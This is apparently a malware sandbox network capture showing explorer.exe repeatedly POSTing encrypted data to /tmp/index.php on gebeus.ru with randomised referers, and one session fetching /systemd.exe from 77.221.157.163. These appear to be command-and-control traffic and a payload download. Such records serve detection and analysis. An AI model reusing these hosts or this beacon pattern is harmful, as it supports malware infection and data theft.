Jul 15, 2024 06:10:39.948596954 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ktdmwvwgrxicbyf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 198 Host: gebeus.ru
Jul 15, 2024 06:10:39.948626995 CEST	198	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 26 47 e2 8e Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA -[k,vu&GIzxDH@;,h0n>24w K\l)O3M/Ka,f1d5N=Pd_-
Jul 15, 2024 06:10:41.435642958 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:10:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49717	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:10:41.445775032 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xjvjtoqsxecwt.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 331 Host: gebeus.ru
Jul 15, 2024 06:10:41.445808887 CEST	331	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7c 24 e8 9a Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA -[k,vu\|$oL`b$(\!dw,*z_sA7JP~Z\ZZIOB8+uBl6p`Wj-g;2u
Jul 15, 2024 06:10:43.023338079 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:10:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49718	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:10:43.032114983 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ikgaobomjngh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 162 Host: gebeus.ru
Jul 15, 2024 06:10:43.032150030 CEST	162	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 33 07 fd be Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA -[k,vu3NI^Q<jX&.t{oYfx; N.$)$
Jul 15, 2024 06:10:44.492043018 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:10:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49719	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:10:44.522825956 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dshprjrooia.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 182 Host: gebeus.ru
Jul 15, 2024 06:10:44.522847891 CEST	182	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 2c 3c e6 a9 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA -[k,vu,<E?~_Vl):P//vPvDgl-B8(^CCA6Rxox42O:H
Jul 15, 2024 06:10:46.049247980 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:10:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49720	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:10:46.058254957 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gejkxdmasvmxo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 250 Host: gebeus.ru
Jul 15, 2024 06:10:46.058290005 CEST	250	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 40 1c dc 90 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA -[k,vu@7]awupQP[8"A[k\II7fd5vtH9=2e-ODM0/'c<('0Vz"Z{G&aD`
Jul 15, 2024 06:10:47.555258989 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:10:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49721	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:10:47.564336061 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jqchsaraxkauihtq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 140 Host: gebeus.ru
Jul 15, 2024 06:10:47.564367056 CEST	140	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 5f 5e a2 93 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA -[k,vu_^_UNbQyDU4_c^ WO\H~
Jul 15, 2024 06:10:49.150578976 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:10:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49722	77.221.157.163	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:10:49.160794020 CEST	163	OUT	GET /systemd.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 77.221.157.163

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49724	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:11:08.758277893 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gxmmgqbcaaod.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 135 Host: gebeus.ru
Jul 15, 2024 06:11:08.758277893 CEST	135	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 35 58 d0 b9 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA -[k,vu5XI^09FG2i$p6?q]A1
Jul 15, 2024 06:11:10.287128925 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:11:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49725	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:11:10.313077927 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xlokwbpjnmjelwgt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 313 Host: gebeus.ru
Jul 15, 2024 06:11:10.313138962 CEST	313	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 3b 25 c0 87 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA -[k,vu;%X\YE5I;Hz?_cSTFt:IUT,MM]C?u-QiVdfVxP_.kc%.b
Jul 15, 2024 06:11:11.772284031 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:11:11 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49726	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:11:11.781486034 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ndqtpbgfxigpiob.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 355 Host: gebeus.ru
Jul 15, 2024 06:11:11.781512976 CEST	355	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 65 20 c4 bc Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA -[k,vue D9qA&\X5J?+!hYImA.;PK}; u.hLS0Mc[jS,o(k{NNo1'fY(m
Jul 15, 2024 06:11:13.237730026 CEST	206	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:11:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49728	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:11:16.430669069 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jklgsoopefuhj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: gebeus.ru
Jul 15, 2024 06:11:16.430692911 CEST	301	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 00 6b 2c 90 f4 76 0b 75 6c 4b e0 bb Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA ,[k,vulKRN\W=5x0-G02\INB%A4AO]3A2vpx]8':57"F,i&}-fGbDWns*!+
Jul 15, 2024 06:11:17.960640907 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:11:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49729	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:11:17.969032049 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cjmjmjmgugawaqj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 141 Host: gebeus.ru
Jul 15, 2024 06:11:17.969573021 CEST	141	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 5c 33 db b6 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA -[k,vu\3^Ou]"Hnq1?[KiOGH!@<
